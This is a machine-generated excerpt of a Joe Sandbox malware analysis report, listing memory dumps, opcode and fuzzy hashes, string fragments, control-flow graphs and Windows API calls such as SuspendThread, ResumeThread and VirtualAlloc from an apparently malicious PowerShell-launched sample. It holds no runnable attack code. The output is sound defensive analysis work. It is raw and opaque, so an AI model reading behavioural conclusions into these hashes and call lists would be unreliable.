                                                                  • Instruction Fuzzy Hash: 5EF0E232A8D5488FE759EB1CE0458A877E0FF05320B6190FAE04DCB463DE25EC44C790
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2562358343.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 73551cc810c09e82e539eb5e1c4e7a3fbd698574b07bad01e3e611af36010216
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: DBE01A31B4C808CFEA79DB0CE0409B973E1EB99321B2161BBD14EC7561CA22EC559BC0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^$L_^$L_^$L_^
                                                                  • API String ID: 0-3303188664
                                                                  • Opcode ID: 3d477d6b754ee4168c2c4e384cc4d55bc25927bacaa3d12c0b61816a04ddc322
                                                                  • Instruction ID: 52eec86d548fed5bcad4aa2cabae12e1d40ea1d5a2755c51e5eb97f7fe514475
                                                                  • Opcode Fuzzy Hash: 3d477d6b754ee4168c2c4e384cc4d55bc25927bacaa3d12c0b61816a04ddc322
                                                                  • Instruction Fuzzy Hash: 0851C192C4E7C38BF65A476A18551B52FE4EF23360F0980F6E08D8B097ED19AA0E57C1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                                                  • API String ID: 0-3225005683
                                                                  • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                  • Instruction ID: 4176c8602b69aee7968f290b64ec331f5eed73d9827c1be3728d877b46de185e
                                                                  • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                  • Instruction Fuzzy Hash: 952101B76080264ED2027BBDB815DFD3760CB9823434592B2D299CB223EE1470CA8EE0

                                                                  Execution Graph

                                                                  Execution Coverage:5.9%
                                                                  Dynamic/Decrypted Code Coverage:81.2%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:16
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 23228 7ffaac72ec6d 23229 7ffaac72ec7b SuspendThread 23228->23229 23231 7ffaac72ed54 23229->23231 23236 7ffaac570758 23237 7ffaac583a60 23236->23237 23238 7ffaac583d5d VirtualAlloc 23237->23238 23239 7ffaac583db5 23238->23239 23224 7ffaac732255 23225 7ffaac73226f GetFileAttributesW 23224->23225 23227 7ffaac732335 23225->23227 23240 7ffaac7304b8 23241 7ffaac7304f3 ResumeThread 23240->23241 23243 7ffaac7305c4 23241->23243 23232 7ffaac730619 23233 7ffaac730627 CloseHandle 23232->23233 23235 7ffaac730704 23233->23235

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 42 7ffaacc88b32-7ffaacc88b38 43 7ffaacc88b39 42->43 44 7ffaacc88d55-7ffaacc88d66 43->44 45 7ffaacc88b3f-7ffaacc88b71 call 7ffaacc888d0 call 7ffaacc887a0 43->45 46 7ffaacc88d68 44->46 47 7ffaacc88d6d-7ffaacc88d78 44->47 45->44 52 7ffaacc88b77-7ffaacc88b9d call 7ffaacc888d0 45->52 46->47 52->43 56 7ffaacc88b9f-7ffaacc88bc9 call 7ffaacc887a0 52->56 56->44 60 7ffaacc88bcf-7ffaacc88c14 call 7ffaacc888d0 56->60 66 7ffaacc88c84-7ffaacc88cc0 call 7ffaacc84100 60->66 67 7ffaacc88c16-7ffaacc88c2a call 7ffaacc887a0 60->67 79 7ffaacc88cf9-7ffaacc88d00 call 7ffaacc831d0 66->79 67->44 72 7ffaacc88c30-7ffaacc88c53 call 7ffaacc888d0 67->72 77 7ffaacc88e25-7ffaacc88e3c 72->77 78 7ffaacc88c59-7ffaacc88c69 72->78 86 7ffaacc88e3e 77->86 87 7ffaacc88e3f-7ffaacc88e4d 77->87 78->77 81 7ffaacc88c6f-7ffaacc88c82 78->81 82 7ffaacc88d05-7ffaacc88d0a 79->82 81->66 81->67 84 7ffaacc88cc2-7ffaacc88ce2 82->84 85 7ffaacc88d0c-7ffaacc88d0e 82->85 84->77 91 7ffaacc88ce8-7ffaacc88cf3 84->91 85->44 90 7ffaacc88d10-7ffaacc88d13 85->90 86->87 88 7ffaacc88e55 87->88 89 7ffaacc88e4f 87->89 93 7ffaacc88e57 88->93 94 7ffaacc88e59-7ffaacc88e98 88->94 89->88 95 7ffaacc88d15 90->95 96 7ffaacc88d19-7ffaacc88d34 90->96 91->79 92 7ffaacc88ddb-7ffaacc88def 91->92 99 7ffaacc88df6-7ffaacc88e01 92->99 100 7ffaacc88df1 92->100 93->94 97 7ffaacc88e99 93->97 94->97 102 7ffaacc88e9a-7ffaacc890da 94->102 95->96 96->77 101 7ffaacc88d3a-7ffaacc88d53 call 7ffaacc887a0 96->101 97->102 100->99 101->44 106 7ffaacc88d79-7ffaacc88d92 call 7ffaacc888d0 101->106 106->77 110 7ffaacc88d98-7ffaacc88d9f 106->110 111 7ffaacc88dc9-7ffaacc88dd1 110->111 112 7ffaacc88dd3-7ffaacc88dd9 111->112 113 7ffaacc88da1-7ffaacc88dbd 111->113 112->92 115 7ffaacc88e02 112->115 113->77 114 7ffaacc88dbf-7ffaacc88dc7 113->114 114->111 115->77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6$r6$r6
                                                                  • API String ID: 0-701349563
                                                                  • Opcode ID: c89ba1494770b6a59308510d36b6686758da62eb22b10a8814f0e2703bfe8b12
                                                                  • Instruction ID: 312956a056fa1d6e62f218718c2e390ec0d1e71e0d40a5376ea4f870a8056d1d
                                                                  • Opcode Fuzzy Hash: c89ba1494770b6a59308510d36b6686758da62eb22b10a8814f0e2703bfe8b12
                                                                  • Instruction Fuzzy Hash: 93C19E70909A469FE789DF28C4906B5B7E1FF56300F44817AD04EC7E86CB28FA55CB90

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 116 7ffaacc8e2d2-7ffaacc8e2d9 117 7ffaacc8e4f5-7ffaacc8e506 116->117 118 7ffaacc8e2df-7ffaacc8e311 call 7ffaacc8e070 call 7ffaacc8df40 116->118 119 7ffaacc8e508 117->119 120 7ffaacc8e50d-7ffaacc8e518 117->120 118->117 125 7ffaacc8e317-7ffaacc8e369 call 7ffaacc8e070 call 7ffaacc8df40 118->125 119->120 125->117 132 7ffaacc8e36f-7ffaacc8e3b4 call 7ffaacc8e070 125->132 138 7ffaacc8e424-7ffaacc8e460 call 7ffaacc869e0 132->138 139 7ffaacc8e3b6-7ffaacc8e3ca call 7ffaacc8df40 132->139 149 7ffaacc8e499-7ffaacc8e4a0 call 7ffaacc8adc8 138->149 139->117 144 7ffaacc8e3d0-7ffaacc8e3f3 call 7ffaacc8e070 139->144 150 7ffaacc8e5c5-7ffaacc8e5dc 144->150 151 7ffaacc8e3f9-7ffaacc8e409 144->151 155 7ffaacc8e4a5-7ffaacc8e4aa 149->155 156 7ffaacc8e5de 150->156 157 7ffaacc8e5df-7ffaacc8e5ed 150->157 151->150 153 7ffaacc8e40f-7ffaacc8e422 151->153 153->138 153->139 158 7ffaacc8e462-7ffaacc8e482 155->158 159 7ffaacc8e4ac-7ffaacc8e4ae 155->159 156->157 161 7ffaacc8e5f5 157->161 162 7ffaacc8e5ef 157->162 158->150 160 7ffaacc8e488-7ffaacc8e493 158->160 159->117 163 7ffaacc8e4b0-7ffaacc8e4b3 159->163 160->149 164 7ffaacc8e57b-7ffaacc8e58f 160->164 165 7ffaacc8e5f7 161->165 166 7ffaacc8e5f9-7ffaacc8e638 161->166 162->161 167 7ffaacc8e4b5 163->167 168 7ffaacc8e4b9-7ffaacc8e4d4 163->168 171 7ffaacc8e596-7ffaacc8e5a1 164->171 172 7ffaacc8e591 164->172 165->166 169 7ffaacc8e639 165->169 166->169 174 7ffaacc8e63a-7ffaacc8e87a 166->174 167->168 168->150 173 7ffaacc8e4da-7ffaacc8e4f3 call 7ffaacc8df40 168->173 169->174 172->171 173->117 178 7ffaacc8e519-7ffaacc8e532 call 7ffaacc8e070 173->178 178->150 182 7ffaacc8e538-7ffaacc8e53f 178->182 183 7ffaacc8e569-7ffaacc8e571 182->183 184 7ffaacc8e573-7ffaacc8e579 183->184 185 7ffaacc8e541-7ffaacc8e55d 183->185 184->164 187 7ffaacc8e5a2 184->187 185->150 186 7ffaacc8e55f-7ffaacc8e567 185->186 186->183 187->150
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6$r6$r6
                                                                  • API String ID: 0-701349563
                                                                  • Opcode ID: 324a8a9b70cdc8e3e3575ada9404cd771ab03c29ff6832577f4d784f33fbb74e
                                                                  • Instruction ID: 5da52f38b543d8b14568bebc040141914f15c3f7dd44736e80ad62a0568ffaa4
                                                                  • Opcode Fuzzy Hash: 324a8a9b70cdc8e3e3575ada9404cd771ab03c29ff6832577f4d784f33fbb74e
                                                                  • Instruction Fuzzy Hash: 2AC1D170509A468FE789DF68C0906B6B7A1FF4A300F5481BDD05EC7A86DB38F9558BC0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 188 7ffaacc89610-7ffaacc8961e 189 7ffaacc89620 188->189 190 7ffaacc8962b-7ffaacc89633 189->190 191 7ffaacc896c1 190->191 193 7ffaacc896cc-7ffaacc8970f 191->193 196 7ffaacc89711-7ffaacc89817 call 7ffaacccaf48 193->196 216 7ffaacc89947-7ffaacc89964 196->216 217 7ffaacc898fc-7ffaacc89c69 196->217 219 7ffaacc8996a-7ffaacc89979 216->219 220 7ffaacc89c71-7ffaacc89cd8 216->220 217->220 219->217 221 7ffaacc8997b-7ffaacc8997f 219->221 226 7ffaacc89e48 220->226 221->196 222 7ffaacc89985 221->222 225 7ffaacc89a03-7ffaacc89a10 222->225 227 7ffaacc89a16-7ffaacc89b76 225->227 228 7ffaacc89987-7ffaacc8999f 225->228 226->226 228->225 229 7ffaacc899a2 call 7ffaacc89610 228->229 229->225
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: b4$r6$r6
                                                                  • API String ID: 0-3183416175
                                                                  • Opcode ID: e5ff455900b2ce66a76449f0ac4f35859c1b597d065ea68e7f62ea838858959b
                                                                  • Instruction ID: 74ed0249a0b56033b3b2755af5723d4e342ba1c61daf49759b2411bfd99b8489
                                                                  • Opcode Fuzzy Hash: e5ff455900b2ce66a76449f0ac4f35859c1b597d065ea68e7f62ea838858959b
                                                                  • Instruction Fuzzy Hash: AD81B971D096498FEBD8DF688455BF97BA1FF56300F0081B9D00ED7292DE389A488B81

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 241 7ffaacc8ea1f-7ffaacc8ea32 242 7ffaacc8ea34-7ffaacc8ea38 241->242 243 7ffaacc8ea7e-7ffaacc8ea94 241->243 246 7ffaacc8ed75 242->246 244 7ffaacc8eb24-7ffaacc8eb30 243->244 245 7ffaacc8ea9a-7ffaacc8eaa2 243->245 244->246 247 7ffaacc8eaa8-7ffaacc8eaba 245->247 248 7ffaacc8ed7f-7ffaacc8edbe 245->248 246->248 247->248 250 7ffaacc8eac0-7ffaacc8ead7 247->250 254 7ffaacc8edc0 248->254 252 7ffaacc8eb17-7ffaacc8eb1e 250->252 253 7ffaacc8ead9-7ffaacc8eae0 250->253 252->244 252->245 253->248 255 7ffaacc8eae6-7ffaacc8eb14 253->255 256 7ffaacc8edcb-7ffaacc8ee61 254->256 255->252 259 7ffaacc8ede6-7ffaacc8ee66 256->259 260 7ffaacc8ee6c-7ffaacc8f335 256->260 259->260 265 7ffaacc8ee08-7ffaacc8ee68 259->265 265->260 269 7ffaacc8ee2c-7ffaacc8ee6a 265->269 269->260 275 7ffaacc8ee4d-7ffaacc8ee60 269->275
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: T^H$b4
                                                                  • API String ID: 0-1226007302
                                                                  • Opcode ID: 8f9bbfc8b648a6b01b545822aca9ae2e86063fbef7540c4d7e333f2ef226ffe5
                                                                  • Instruction ID: 5acb4a49a13793854fb16971ab318e66283789985b055230b4d6851537193e88
                                                                  • Opcode Fuzzy Hash: 8f9bbfc8b648a6b01b545822aca9ae2e86063fbef7540c4d7e333f2ef226ffe5
                                                                  • Instruction Fuzzy Hash: 9381F430919546CFEB99DF18C4956B67BA1FF56300F04C1FDC45E8B68ACA38E989CB81

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $r6
                                                                  • API String ID: 0-2810495310
                                                                  • Opcode ID: b1451127be0f66db3f3607bb62c6f2084f8e45cfe98edc0b9f3f90b0f4d7d666
                                                                  • Instruction ID: 75955b6d5c2b855135000a74af948789c8fbefa88ea6f898792737f41c409b4a
                                                                  • Opcode Fuzzy Hash: b1451127be0f66db3f3607bb62c6f2084f8e45cfe98edc0b9f3f90b0f4d7d666
                                                                  • Instruction Fuzzy Hash: 6D515D74D0964ACFEB99DF98C4555BEB7B1EF45300F1080BED01EE7292CA78AA05CB90

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $r6
                                                                  • API String ID: 0-2810495310
                                                                  • Opcode ID: 2768b3a922162d1ef4f4b8e01439adfb39065debfc8f58186d1064bbe7480cc0
                                                                  • Instruction ID: 30b6b70bb0fbca777f95251ee55d23f56b1c133a7fc779c9b0aa54e6c3cb0b29
                                                                  • Opcode Fuzzy Hash: 2768b3a922162d1ef4f4b8e01439adfb39065debfc8f58186d1064bbe7480cc0
                                                                  • Instruction Fuzzy Hash: 7C515F71D0964ACFEB89DF94C4555BEB7B1EF49300F108179D01EE7692CB39AA09CB90

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6$r6
                                                                  • API String ID: 0-2018302956
                                                                  • Opcode ID: 041c64ee0114b887be1bb5225979dfb45a3e09445c068db60bc1c9314ba86e03
                                                                  • Instruction ID: c23c72b3cbc6f903da67f24352fb9e9daba24262317b12ce63473c95d7d2a8de
                                                                  • Opcode Fuzzy Hash: 041c64ee0114b887be1bb5225979dfb45a3e09445c068db60bc1c9314ba86e03
                                                                  • Instruction Fuzzy Hash: 4A312D71A1991A9FEB88DF58D4919BAB7A1FF59710B108139D00ED7682CE24FC158BC0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 351 7ffaacc87b35-7ffaacc87b57 354 7ffaacc87b59-7ffaacc87b5b 351->354 355 7ffaacc87bc8-7ffaacc87bd1 call 7ffaacc87d48 351->355 357 7ffaacc87b5d 354->357 358 7ffaacc87bd7-7ffaacc87bf1 354->358 364 7ffaacc87bd4-7ffaacc87bd6 355->364 365 7ffaacc87bd3 355->365 360 7ffaacc87b61 357->360 361 7ffaacc87b5f-7ffaacc87b60 357->361 370 7ffaacc87bf8-7ffaacc87c00 358->370 371 7ffaacc87bf3 358->371 362 7ffaacc87b99-7ffaacc87bc4 call 7ffaacc819c0 360->362 363 7ffaacc87b63-7ffaacc87b81 360->363 361->360 362->355 375 7ffaacc87b83-7ffaacc87b85 363->375 376 7ffaacc87bf2-7ffaacc87bf7 363->376 364->358 365->364 372 7ffaacc87c01-7ffaacc87c03 370->372 371->370 375->372 378 7ffaacc87b87 375->378 376->370 379 7ffaacc87b8a-7ffaacc87b91 call 7ffaacc82d18 378->379 380 7ffaacc87b89 378->380 383 7ffaacc87b96-7ffaacc87b97 379->383 380->379 383->362
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6$r6
                                                                  • API String ID: 0-2018302956
                                                                  • Opcode ID: 615ec8e261f9dcab82550b211bf7a81893c39b0a8703b638a12e9165d1c807db
                                                                  • Instruction ID: 82c2099cbb71b3fee088759642e23cddc160d08de00ca6f0b25ec51564028542
                                                                  • Opcode Fuzzy Hash: 615ec8e261f9dcab82550b211bf7a81893c39b0a8703b638a12e9165d1c807db
                                                                  • Instruction Fuzzy Hash: F731E67190D659CFF798DB6888522B9B7D2EF56710F0441BAE00EC76C2FD18A90987D1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 405 7ffaac7304b8-7ffaac7304f1 406 7ffaac7304f4-7ffaac7305c2 ResumeThread 405->406 407 7ffaac7304f3 405->407 411 7ffaac7305ca-7ffaac730614 406->411 412 7ffaac7305c4 406->412 407->406 412->411
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2781896614.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac720000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: a1e503764cffc255023b8ae906ee4c5887f64426b14c117d0f2432d77ff1ce29
                                                                  • Instruction ID: 3ab810e263d01fa37ce92c6fef4e36828f7085750ae722d5b208d2bd58320bb7
                                                                  • Opcode Fuzzy Hash: a1e503764cffc255023b8ae906ee4c5887f64426b14c117d0f2432d77ff1ce29
                                                                  • Instruction Fuzzy Hash: 2F519B7090C78C8FDB56DFA8D854AE9BFF0EF56310F0441ABD049EB292DA349986CB51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 415 7ffaac570755-7ffaac570757
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2772819860.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac570000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: e1bb6c4f19e079f9962b743892734e1a2d21f8c619ee4b41ab859c9d14bab20a
                                                                  • Instruction ID: bba27e356cd609b902752ee11584fa7ab8b83e531822db56e2a283c5949868e1
                                                                  • Opcode Fuzzy Hash: e1bb6c4f19e079f9962b743892734e1a2d21f8c619ee4b41ab859c9d14bab20a
                                                                  • Instruction Fuzzy Hash: D0D17C7095864D8FEB94EF68C845AEDBBF1FF59301F0041AAE44DD3252DB34A985CB81

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2772819860.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac570000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: e04d0cee3fcd06d3f84ba06ad9f70a14b8a207e85bf4fe5815a382eff50ff464
                                                                  • Instruction ID: 3779b04f33986b7ca8321bd01a0bb55d285ba299bdfd1630631892a9d178342c
                                                                  • Opcode Fuzzy Hash: e04d0cee3fcd06d3f84ba06ad9f70a14b8a207e85bf4fe5815a382eff50ff464
                                                                  • Instruction Fuzzy Hash: BBD18C70958A4D8FEB94EF68C845AEDBBF1FF59301F0041AAE44DD3252DB34A985CB81

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 463 7ffaac72ec6d-7ffaac72ec79 464 7ffaac72ec7b-7ffaac72ec83 463->464 465 7ffaac72ec84-7ffaac72ed52 SuspendThread 463->465 464->465 468 7ffaac72ed5a-7ffaac72eda4 465->468 469 7ffaac72ed54 465->469 469->468
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2781896614.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac720000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID: SuspendThread
                                                                  • String ID:
                                                                  • API String ID: 3178671153-0
                                                                  • Opcode ID: 8a1297c6bc7f36988aac38a85e3f2df923d4dc1f7d2d27b9989e555d4dd9cbab
                                                                  • Instruction ID: f5d49fc720317a2bed09d9fa49d4dfb548c0c8c17a92c2d6b367d5136bd16f5a
                                                                  • Opcode Fuzzy Hash: 8a1297c6bc7f36988aac38a85e3f2df923d4dc1f7d2d27b9989e555d4dd9cbab
                                                                  • Instruction Fuzzy Hash: 4F413870D0864C8FDB59DFA8D889BADBBF0FB5A310F10416AD449E7292DA70A885CF41

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 472 7ffaac732255-7ffaac732333 GetFileAttributesW 476 7ffaac73233b-7ffaac732379 472->476 477 7ffaac732335 472->477 477->476
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2781896614.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac720000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 580c6b20468f62b43e7d55af68a6688978e29de3b0fed4668de5f107a781afee
                                                                  • Instruction ID: 0fd8dd8669ce51df7223dbe9ded50b86a81bd81ede78c6b93b62735bc33beaec
                                                                  • Opcode Fuzzy Hash: 580c6b20468f62b43e7d55af68a6688978e29de3b0fed4668de5f107a781afee
                                                                  • Instruction Fuzzy Hash: 0741F870E0861C8FDB98DF98D885BEDBBF0EB5A311F10416AD44DE7252DA71A885CF40

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: P~
                                                                  • API String ID: 0-2466740200
                                                                  • Opcode ID: fe8adcfc8e751eb73549f55cb2b8bc988d0033399318b83a8583c82bf93be4fe
                                                                  • Instruction ID: c945b1698bd99908bb48728b523e8ccca7db016df5714c6218b06c74a413e2b1
                                                                  • Opcode Fuzzy Hash: fe8adcfc8e751eb73549f55cb2b8bc988d0033399318b83a8583c82bf93be4fe
                                                                  • Instruction Fuzzy Hash: 3DA1C67191DA89CFE7D5DF28C8556B97BE1EF56300F4480BAE04EC72A2DE18ED098781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: x^
                                                                  • API String ID: 0-3107577783
                                                                  • Opcode ID: 935f900d48031bc9d8305c3df7071e9609940e79cec30f8bc21c98217f59444a
                                                                  • Instruction ID: e931fa41dda6e9c1eb554d4ed98a238157ba2e53b046b23c08b4909cd1a8bf7b
                                                                  • Opcode Fuzzy Hash: 935f900d48031bc9d8305c3df7071e9609940e79cec30f8bc21c98217f59444a
                                                                  • Instruction Fuzzy Hash: 77613965D0E68A8FFB959B6888115FE7BA1FF86300F54C1B5D04EC7192DE2CAD4983C0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: /
                                                                  • API String ID: 0-1686368129
                                                                  • Opcode ID: 2976c38329acff30e2d01ddc1093f5a18e99c8785cb24c57fb53e6839e147a64
                                                                  • Instruction ID: 9da5dff9b6bd5f64f8535fd22d52ad8615289add3c0006279e43cb8ec5c644c4
                                                                  • Opcode Fuzzy Hash: 2976c38329acff30e2d01ddc1093f5a18e99c8785cb24c57fb53e6839e147a64
                                                                  • Instruction Fuzzy Hash: DF71CE31D1E64ECEFF95DF64C8546BE7BA0EF46300F1044BAD00ED7182DEA8AA498781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: /
                                                                  • API String ID: 0-1686368129
                                                                  • Opcode ID: 6a4f60eacdefc80de58b9c636a0f0f5570dfee1c73011e0786f30b1200c3f487
                                                                  • Instruction ID: 64a668281ee9e80759be067d5579cee4a8bea1ab51f7e42518a746bd6293b195
                                                                  • Opcode Fuzzy Hash: 6a4f60eacdefc80de58b9c636a0f0f5570dfee1c73011e0786f30b1200c3f487
                                                                  • Instruction Fuzzy Hash: AF71C272D1D64ACEFB94DF64C8146BEBBA0EF46300F1084BAD00ED71C2DE38A9498781
